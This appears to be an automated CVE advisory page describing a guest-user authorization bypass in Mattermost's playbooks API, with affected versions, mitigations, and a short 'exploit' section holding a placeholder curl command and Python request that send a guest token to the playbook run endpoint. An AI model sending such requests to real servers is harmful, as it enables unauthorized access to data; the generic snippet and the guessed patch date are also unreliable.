Listen to this Post
How the CVE Works
Mattermost fails to properly validate `requestorInfo` for guest users in the playbooks handler. This flaw allows unauthorized guest users to bypass access controls and interact with playbook runs. The vulnerability stems from insufficient permission checks when retrieving user context, enabling attackers to escalate privileges within the affected versions. The issue affects API endpoints handling playbook operations, where guest users can manipulate requests to gain unintended access.
DailyCVE Form
Platform: Mattermost
Version: 10.5.0-10.5.5, 9.11.0-9.11.15, 10.8.0, 10.7.0-10.7.2, 10.6.0-10.6.5
Vulnerability: Authorization Bypass
Severity: Moderate
Date: Jun 20, 2025
Prediction: Patch by Jul 10, 2025
What Undercode Say
curl -X GET "http://<target>/api/v4/playbooks/<id>/run" -H "Authorization: Bearer <guest_token>"
import requests
response = requests.get("http://<target>/api/v4/playbooks/123/run", headers={"Authorization": "Bearer <guest_token>"})
print(response.text)
How Exploit
1. Obtain guest user credentials.
- Send crafted API request to playbook run endpoint.
3. Bypass access controls.
Protection from this CVE
- Upgrade to patched versions.
- Restrict guest permissions.
- Monitor API logs.
Impact
Unauthorized playbook access.
Data leakage risk.
Privilege escalation.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
